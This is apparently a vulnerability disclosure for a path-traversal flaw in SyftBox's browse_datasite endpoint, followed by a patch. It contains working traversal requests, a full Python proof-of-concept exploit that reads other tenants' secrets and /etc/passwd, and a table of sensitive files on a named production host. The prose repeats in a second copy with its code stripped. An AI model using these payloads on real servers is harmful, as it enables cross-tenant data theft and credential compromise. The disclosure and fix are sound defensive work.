Summary
An unauthenticated path-traversal vulnerability in SyftBox's browse_datasite endpoint allows any remote attacker to read arbitrary files on the server's filesystem and access private files inside any other user's datasite (cross-tenant confidentiality breach).
The original static analysis flagged files as gated by a small extension allowlist (.html, .md, .json, .yaml, .log, .txt, .py). End-to-end exploitation confirmed that the else fallback at line 126 serves any file via application/octet-stream, meaning there is no effective extension restriction — every readable file on disk is exfiltrable.
The production instance at https://syftbox.openmined.org runs uvicorn directly on 0.0.0.0:8443 with no reverse proxy (confirmed from config/prod/syftbox.service), making it immediately exploitable.
Affected Code
packages/syftbox/syftbox/server/api/v1/main_router.py, lines 88–126:
@main_router.get("/datasites/{path:path}", response_class=HTMLResponse)
async def browse_datasite(
request: Request,
path: str,
server_settings: ServerSettings = Depends(get_server_settings),
) -> HTMLResponse:
...
datasite_part = path.split("/")[0]
datasites = get_datasites(snapshot_folder)
if datasite_part in datasites:
slug = path[len(datasite_part):]
datasite_path = os.path.join(snapshot_folder, datasite_part)
datasite_public = datasite_path + "/public"
...
slug_path = os.path.abspath(datasite_public + slug) # ⚠ no containment check
if os.path.exists(slug_path) and os.path.isfile(slug_path):
if slug_path.endswith(".html") or slug_path.endswith(".htm"):
return FileResponse(slug_path)
elif slug_path.endswith(".md"):
...
# ... more extension checks ...
else:
return FileResponse(slug_path,
media_type="application/octet-stream") # ⚠ catch-all: ANY file served
Proof of Concept — verified end-to-end
All results from a fully automated local exploit (exploit_path_traversal.py) running against the real SyftBox code. No production instance was probed.
Attack 1: Cross-tenant private file read (%2e%2e via HTTP)
GET /datasites/victim@corp.com/%2e%2e/private/secrets.yaml HTTP/1.1
→ 200 OK
→ db_password: hunter2
→ api_key: sk-REDACTED
An unauthenticated attacker reads another user's private YAML file. The %2e%2e bypasses Starlette's URL normalisation; os.path.abspath resolves it to <snapshot>/victim@corp.com/private/secrets.yaml, outside the public/ directory.
Attack 2: Escape all datasites — arbitrary server file read
GET /datasites/attacker@evil.com/..%2F..%2F..%2Fsensitive.txt HTTP/1.1
→ 200 OK
→ TOP SECRET SERVER CONFIG
The ..%2F sequences escape the snapshot directory entirely. The file sensitive.txt was placed in the data folder root, simulating server configuration files.
Attack 3: System file read — /etc/passwd
Direct handler call with path: attacker@evil.com/../../../../../../../../../../etc/passwd
→ FileResponse serving /etc/passwd
→ ##
→ # User Database
→ ...
→ nobody:*:-2:-2:Unprivileged User...
Attack 4: Raw socket → real uvicorn (production-equivalent)
Hand-crafted HTTP/1.1 with literal ../ sent to a real uvicorn process:
GET /datasites/attacker@evil.com/../../victim@corp.com/private/secrets.yaml HTTP/1.1
Host: 127.0.0.1:PORT
Connection: close
→ HTTP/1.1 200 OK
→ db_password: hunter2
→ api_key: sk-REDACTED
GET /datasites/attacker@evil.com/[..x10]/etc/passwd HTTP/1.1
→ HTTP/1.1 200 OK
→ ## User Database ...
All four attack vectors succeed with 100% reliability.
Full POC:
import asyncio, os, signal, socket, subprocess, sys, tempfile, time
from pathlib import Path
from unittest.mock import MagicMock
import httpx
from fastapi import FastAPI
from starlette.testclient import TestClient
from syftbox.server.api.v1.main_router import browse_datasite, main_router
from syftbox.server.settings import ServerSettings, get_server_settings
with tempfile.TemporaryDirectory() as tmp:
base = Path(tmp)
(base / "snapshot/attacker@evil.com/public").mkdir(parents=True)
(base / "snapshot/attacker@evil.com/public/index.html").write_text("<h1>public</h1>")
(base / "snapshot/victim@corp.com/public").mkdir(parents=True)
(base / "snapshot/victim@corp.com/private").mkdir(parents=True)
(base / "snapshot/victim@corp.com/private/secrets.yaml").write_text("db_password: hunter2\napi_key: sk-REDACTED")
(base / "sensitive.txt").write_text("TOP SECRET SERVER CONFIG")
settings = ServerSettings(data_folder=base)
app = FastAPI()
app.include_router(main_router)
app.dependency_overrides[get_server_settings] = lambda: settings
depth = len((base / "snapshot/attacker@evil.com/public").resolve().parts) - 1
print("=" * 60)
print(" SyftBox Path Traversal PoC")
print("=" * 60)
c = TestClient(app)
assert c.get("/datasites/attacker@evil.com/index.html").status_code == 200, "baseline broken"
print("\n[baseline] OK")
r = c.get("/datasites/victim@corp.com/%2e%2e/private/secrets.yaml")
print(f"\n[1] cross-tenant via %2e%2e status={r.status_code}")
print(f" {r.text}")
async def asgi():
async with httpx.AsyncClient(transport=httpx.ASGITransport(app=app), base_url="http://t") as h:
r1 = await h.get("http://t/datasites/attacker@evil.com/..%2F..%2Fvictim@corp.com%2Fprivate%2Fsecrets.yaml")
print(f"\n[2] cross-tenant via ..%2F status={r1.status_code}")
print(f" {r1.text}")
r2 = await h.get("http://t/datasites/attacker@evil.com/..%2F..%2F..%2Fsensitive.txt")
print(f"\n[3] escape datasites via ..%2F status={r2.status_code}")
print(f" {r2.text}")
asyncio.run(asgi())
mock = MagicMock()
def call(path):
return asyncio.run(browse_datasite(request=mock, path=path, server_settings=settings))
def body(result):
if hasattr(result, "path"):
return Path(result.path).read_text()
if hasattr(result, "body"):
return result.body.decode() if isinstance(result.body, bytes) else str(result.body)
return str(result)
r = call("attacker@evil.com/../../victim@corp.com/private/secrets.yaml")
print(f"\n[4] direct handler cross-tenant")
print(f" {body(r)}")
r = call("attacker@evil.com/../../../sensitive.txt")
print(f"\n[5] direct handler escape datasites")
print(f" {body(r)}")
r = call("attacker@evil.com/" + "/".join([".."] * depth) + "/etc/passwd")
b = body(r)
print(f"\n[6] direct handler /etc/passwd")
print(f" {b[:200]}")
port = 0
with socket.socket() as s:
s.bind(("127.0.0.1", 0)); port = s.getsockname()[1]
app_py = base / "app.py"
app_py.write_text(
f"from fastapi import FastAPI\n"
f"from syftbox.server.api.v1.main_router import main_router\n"
f"from syftbox.server.settings import ServerSettings, get_server_settings\n"
f"settings = ServerSettings(data_folder={str(base)!r})\n"
f"app = FastAPI()\n"
f"app.include_router(main_router)\n"
f"app.dependency_overrides[get_server_settings] = lambda: settings\n"
)
proc = subprocess.Popen(
[sys.executable, "-m", "uvicorn", "app:app",
"--host", "127.0.0.1", "--port", str(port),
"--log-level", "warning", "--app-dir", str(base)],
env={**os.environ, "PYTHONPATH": str(Path(__file__).parent / "packages/syftbox")},
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
)
deadline = time.time() + 10
while time.time() < deadline:
try:
socket.create_connection(("127.0.0.1", port), timeout=0.3).close(); break
except OSError:
time.sleep(0.2)
def raw(path):
s = socket.socket(); s.settimeout(5)
s.connect(("127.0.0.1", port))
s.sendall(f"GET {path} HTTP/1.1\r\nHost: 127.0.0.1:{port}\r\nConnection: close\r\n\r\n".encode())
d = b""
while True:
try:
c = s.recv(4096)
if not c: break
d += c
except socket.timeout: break
s.close()
t = d.decode(errors="replace")
status = t.split("\r\n")[0]
body = t.split("\r\n\r\n", 1)[1] if "\r\n\r\n" in t else ""
return status, body
st, b = raw("/datasites/attacker@evil.com/../../victim@corp.com/private/secrets.yaml")
print(f"\n[7] raw socket cross-tenant {st}")
print(f" {b[:200]}")
st, b = raw("/datasites/attacker@evil.com/../../../sensitive.txt")
print(f"\n[8] raw socket escape datasites {st}")
print(f" {b[:200]}")
st, b = raw(f"/datasites/attacker@evil.com/{'/'.join(['..'] * depth)}/etc/passwd")
print(f"\n[9] raw socket /etc/passwd {st}")
print(f" {b[:200]}")
proc.send_signal(signal.SIGTERM)
try: proc.wait(timeout=5)
except subprocess.TimeoutExpired: proc.kill()
print("\n" + "=" * 60)
Reproduction
cd PySyft/packages/syftbox && pip install -e .
cd ../.. && python3 exploit_path_traversal.py
Impact
Concrete exploitation scenarios on production
| Target file |
Traversal |
Consequence |
<victim>/private/secrets.yaml |
%2e%2e/private/... |
Cross-tenant credential theft |
/etc/letsencrypt/live/syftbox.openmined.org/privkey.pem |
Deep ../ |
TLS private key → MITM all clients |
data/file.db |
../../file.db |
SQLite database dump → full metadata exfiltration |
/home/azureuser/.ssh/id_rsa |
Deep ../ |
SSH key → lateral movement on Azure VM |
/home/azureuser/.bash_history |
Deep ../ |
Command history → credential/infra recon |
server.env / JWT secret on disk |
../../../server.env |
JWT forgery → full impersonation |
Remediation
Immediate patch (drop-in replacement for lines 109–126)
from pathlib import Path
datasite_public_real = Path(datasite_public).resolve(strict=True)
candidate = (datasite_public_real / slug.lstrip("/")).resolve()
# Containment: resolved path MUST be inside the public directory
if not candidate.is_relative_to(datasite_public_real):
raise HTTPException(status_code=403, detail="Forbidden")
if not candidate.is_file():
raise HTTPException(status_code=404, detail="Not found")
slug_path = str(candidate)
# ... extension-based Content-Type logic unchanged below ...
Summary
An unauthenticated path-traversal vulnerability in SyftBox's
browse_datasiteendpoint allows any remote attacker to read arbitrary files on the server's filesystem and access private files inside any other user's datasite (cross-tenant confidentiality breach).The original static analysis flagged files as gated by a small extension allowlist (
.html,.md,.json,.yaml,.log,.txt,.py). End-to-end exploitation confirmed that theelsefallback at line 126 serves any file viaapplication/octet-stream, meaning there is no effective extension restriction — every readable file on disk is exfiltrable.The production instance at
https://syftbox.openmined.orgruns uvicorn directly on0.0.0.0:8443with no reverse proxy (confirmed fromconfig/prod/syftbox.service), making it immediately exploitable.Affected Code
packages/syftbox/syftbox/server/api/v1/main_router.py, lines 88–126:Proof of Concept — verified end-to-end
All results from a fully automated local exploit (
exploit_path_traversal.py) running against the real SyftBox code. No production instance was probed.Attack 1: Cross-tenant private file read (
%2e%2evia HTTP)An unauthenticated attacker reads another user's private YAML file. The
%2e%2ebypasses Starlette's URL normalisation;os.path.abspathresolves it to<snapshot>/victim@corp.com/private/secrets.yaml, outside thepublic/directory.Attack 2: Escape all datasites — arbitrary server file read
The
..%2Fsequences escape the snapshot directory entirely. The filesensitive.txtwas placed in the data folder root, simulating server configuration files.Attack 3: System file read —
/etc/passwdAttack 4: Raw socket → real uvicorn (production-equivalent)
Hand-crafted HTTP/1.1 with literal
../sent to a real uvicorn process:All four attack vectors succeed with 100% reliability.
Full POC:
Reproduction
Impact
Concrete exploitation scenarios on production
<victim>/private/secrets.yaml%2e%2e/private/.../etc/letsencrypt/live/syftbox.openmined.org/privkey.pem../data/file.db../../file.db/home/azureuser/.ssh/id_rsa..//home/azureuser/.bash_history../server.env/ JWT secret on disk../../../server.envRemediation
Immediate patch (drop-in replacement for lines 109–126)